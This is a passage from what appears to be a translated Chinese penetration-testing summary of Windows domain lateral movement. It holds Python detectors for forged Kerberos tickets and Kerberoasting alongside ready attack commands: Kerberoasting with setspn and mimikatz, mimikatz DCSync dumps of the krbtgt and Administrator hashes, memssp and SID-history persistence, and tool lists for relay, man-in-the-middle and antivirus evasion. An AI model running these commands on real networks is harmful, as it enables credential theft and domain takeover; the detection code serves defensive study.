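    for e in dc_events:
        if e["id"] == 4768:
            tgt_times[e["user"].lower()].append(e["time"])
    hits = []
    for e in dc_events:
        if e["id"] != 4769:
            continue
        prior = [t for t in tgt_times[e["user"].lower()]
                 if e["time"] - lookback <= t <= e["time"]]
        if not prior:
            hits.append((e["user"], e["service"], e["time"]))
    return hits


def suspected_silver_tickets(dc_events, member_events, lookback=LOOKBACK):
    """A Kerberos network logon on a member server with no service-ticket
    request by that user on any DC inside the look-back window: the service
    ticket never came from a DC, matching a forged TGS (silver ticket)."""
    tgs_times = defaultdict(list)
    for e in dc_events:
        if e["id"] == 4769:
            tgs_times[e["user"].lower()].append(e["time"])
    hits = []
    for e in member_events:
        if e["id"] != 4624 or e["logon_type"] != 3 or e["package"] != "Kerberos":
            continue
        prior = [t for t in tgs_times[e["user"].lower()]
                 if e["time"] - lookback <= t <= e["time"]]
        if not prior:
            hits.append((e["user"], e["host"], e["time"]))
    return hits


if __name__ == "__main__":
    print("possible golden tickets:", suspected_golden_tickets(DC_EVENTS))
    print("possible silver tickets:",
          suspected_silver_tickets(DC_EVENTS, MEMBER_EVENTS))
```

Both checks need the logs of every DC aggregated, and they are deliberately coarse: a 4769 records the service account name rather than the host the ticket was used on, so a stricter version resolves the SPN to its account and demands a 4769 for that exact user/service pair. Tickets cached from before the look-back window and TGT renewals will produce false positives, which is why the look-back is tied to the domain's actual ticket-lifetime policy.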

(5) Cracking domain service accounts

Same principle as the SPN scanning above.
Tool: https://github.com/nidem/kerberoast

# get all accounts used as SPNs
setspn -T PENTEST.com -Q */*
# export the obtained tickets from Mimikatz's memory
kerberos::list /export
# crack with tgsrepcrack
tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
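The SPN scanning section above says this technique is hard to detect because the LDAP query and the ticket request look like normal Kerberos traffic. The ticket requests themselves do leave a trace on the domain controller: each one is logged as Security event 4769, and cracking tools ask for RC4-HMAC tickets (TicketEncryptionType 0x17) because those are the cheapest to brute-force. The script below is an added example for this page, not code from the original post or from the kerberoast tool it links. It flags any requester that obtains RC4 service tickets for several distinct service accounts within a short window, ignoring computer accounts (names ending in $) and krbtgt, whose long random passwords make their tickets impractical to crack. The event lines are constructed sample data in a simplified space-separated form (timestamp, requester, ServiceName, TicketEncryptionType, client IP), not real Windows log output; the window and threshold are tunable assumptions.

```python
"""Flag likely Kerberoasting from domain-controller event 4769 records.

Added example for this page; not part of the original post or of the
kerberoast tool it links. The input is constructed sample data in a
simplified one-line-per-event form, not real Windows log output."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # TicketEncryptionType value for RC4-HMAC
WINDOW = timedelta(minutes=5)  # assumption: burst length to look for
THRESHOLD = 3                  # assumption: distinct service accounts per burst

# Constructed 4769 sample: timestamp, requesting account, ServiceName
# (the service account the ticket is for), TicketEncryptionType, client IP.
SAMPLE_4769 = """\
2022-07-30T10:00:01 alice@EXAMPLE.LOCAL svc_sql 0x12 10.0.0.15
2022-07-30T10:00:02 alice@EXAMPLE.LOCAL FS01$ 0x12 10.0.0.15
2022-07-30T10:05:00 bob@EXAMPLE.LOCAL svc_sql 0x17 10.0.0.42
2022-07-30T10:05:00 bob@EXAMPLE.LOCAL svc_web 0x17 10.0.0.42
2022-07-30T10:05:01 bob@EXAMPLE.LOCAL svc_backup 0x17 10.0.0.42
2022-07-30T10:05:01 bob@EXAMPLE.LOCAL WS01$ 0x17 10.0.0.42
2022-07-30T10:05:02 bob@EXAMPLE.LOCAL svc_sql2 0x17 10.0.0.42
2022-07-30T10:30:00 carol@EXAMPLE.LOCAL svc_legacy 0x17 10.0.0.77
"""


def parse_4769(text):
    """Parse the simplified sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, service, etype, ip = line.split()
        events.append({"time": datetime.fromisoformat(ts), "user": user,
                       "service": service, "etype": etype.lower(), "ip": ip})
    return events


def is_crackable_target(service):
    """Computer accounts (trailing '$') and krbtgt have long random passwords,
    so RC4 tickets for them are not a realistic Kerberoast target."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(events, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per requester that obtained RC4 service tickets for at
    least `threshold` distinct user service accounts within `window`."""
    by_user = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e["etype"] == RC4_HMAC and is_crackable_target(e["service"]):
            by_user[e["user"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        for i, start in enumerate(evs):
            # sliding window anchored on each RC4 request by this user
            services = set()
            for e in evs[i:]:
                if e["time"] - start["time"] > window:
                    break
                services.add(e["service"])
            if len(services) >= threshold:
                alerts.append({"user": user, "ip": start["ip"],
                               "first_seen": start["time"],
                               "services": sorted(services)})
                break  # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(parse_4769(SAMPLE_4769)):
        print(f"{a['user']} from {a['ip']} at {a['first_seen']}: "
              f"RC4 tickets for {', '.join(a['services'])}")
```

Service accounts that genuinely still need RC4 (legacy services) will trip this rule; the durable fix is AES-only service accounts with long random passwords (group managed service accounts) rather than raising the threshold. Real 4769 records also carry TicketOptions and a Status field, and only successful requests (status 0x0) are worth counting.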

(6) NTLM relay

References:

  • Learning NTLM relay attack and defense from Xuanwu

  • Intranet penetration testing: analysis of NTLM relay attacks

  • One API call away from Domain Admin

  • privexchange

  • Exchange2domain

Methods for actively making a target machine initiate an NTLM request:

  • printerbug

  • PetitPotam

Relay LDAP:

  • CVE-2019-1040-dcpwn

Relay AD CS/PKI:

  • AD CS/PKI template exploit

(7) Kerberos delegation

  • Wagging-the-Dog.html

  • s4u2pwnage

  • Attacking Kerberos Delegation

  • Taking the domain controller via the print service

  • Computer Takeover

  • Combining NTLM Relaying and Kerberos delegation

  • CVE-2019-1040

(8) Address Resolution Protocol (ARP)

Resort to ARP only when nothing else works.

References:

  • Understanding ARP in one article

  • Understanding ARP spoofing in one article

ZeroLogon (CVE-2020-1472):

  • Commands for attacking a domain controller with mimikatz via ZeroLogon (with a blue-team self-check plan)

  • ZeroLogon (CVE-2020-1472) attack and defense strategies (part 1)

  • ZeroLogon (CVE-2020-1472) attack and defense strategies (part 2)

3. Obtaining AD hashes

References:

  • How Attackers Dump Active Directory Database Credentials

  • Three ways to obtain password hashes from NTDS.dit

  • Domain penetration: obtaining the domain controller's NTDS.dit file

  • Invoke-NinaCopy

Methods:

  • Use a VSS shadow copy

  • Obtain the NTDS.DIT file with Ntdsutil

  • Extract NTDS.DIT with PowerShell

  • Extract with Mimikatz: mimikatz "lsadump::lsa /inject" exit

  • Use Mimikatz DCSync to remotely dump Active Directory credentials
    Extract the KRBTGT account's password data: Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt" exit
    Extract the Administrator account's password data: Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit

  • Extract hashes from NTDS.dit: recover with esedbexport, then extract with ntdsxtract

4. AD persistence

(1) Active Directory persistence tricks

References:

  • Sneaky Active Directory Persistence Tricks

  • Using DSRM password synchronization to persist domain controller access

  • DCShadow: a new AD attack technique

(2) Security Support Provider

Reference: Domain penetration: Security Support Provider – 三好学生

Security Support Provider, literally "security support provider", is also known as a Security Package. Put simply, an SSP is a DLL that implements authentication.

privilege::debug
misc::memssp

This way no reboot is required; the newly generated file kiwissp.log can be found in c:/windows/system32.

(3) SID History

Reference: Sneaky Active Directory Persistence #14: SID History

Allows the access of one account to be effectively cloned onto another account.

mimikatz "privilege::debug" "misc::addsid bobafett ADS\Administrator"

(4) Group Policy

References:

  • Sneaky Active Directory Persistence #17: Group Policy

  • [Technical share] BadGPO: using Group Policy Objects for persistence and lateral movement

(5) Hook PasswordChangeNotify

  • Domain penetration: Hook PasswordChangeNotify – 三好学生

(6) Kerberoasting backdoor

  • Domain penetration: Kerberoasting

(7) AdminSDHolder

  • Backdooring AdminSDHolder for Persistence

  • Using AdminSDHolder to maintain privileges

  • AdminSDHolder in domain penetration

(8) Delegation

  • Unconstrained Domain Persistence

5. Other

(1) Exchange

  • Exchange2domain

  • CVE-2018-8581

  • CVE-2019-1040

  • CVE-2020-0688

  • NtlmRelayToEWS

  • ewsManage

  • CVE-2021-26855

  • CVE-2021-28482

(2) Tips

  • "Domain penetration: Dump Clear-Text Password after KB2871997 installed"

  • "Domain penetration: Hook PasswordChangeNotify"
    Hooking PasswordChangeNotify can record domain administrators' new passwords in real time

  • "Domain penetration: Local Administrator Password Solution"
    During domain penetration, remember to pay attention to the local administrator accounts of hosts in the domain

  • "Domain penetration: using SYSVOL to recover passwords saved in Group Policy"

(3) Tools

  • BloodHound

  • SharpAddDomainMachine

  • CrackMapExec

  • DeathStar

III. Remote execution

  • at command

  • psexec

  • WMIC

  • Wmiexec

  • Smbexec

  • Powershell remoting

  • DCOM

  • Winrm

IV. IoT

  • Routers: routersploit

  • Printers: PRET

  • IOT exp

  • OWASP-Nettacker

  • isf

  • icsmaster

V. Man-in-the-middle

  • Cain

  • Ettercap

  • Responder

  • MITMf

  • bettercap

VI. Evading antivirus

1. Bypass AppLocker

  • UltimateAppLockerByPassList

  • LOLBAS

  • GTFOBins

2. Bypass AV

  • Empire

  • PEspin

  • Shellter

  • Ebowla

  • Veil

  • Code injection technique: Process Doppelgänging

Conclusion

This article compiled a summary of lateral movement methods.







Originally published on the WeChat public account 红客突击队: 横向渗透方法小结

Source: https://cn-sec.com/archives/1210569.html
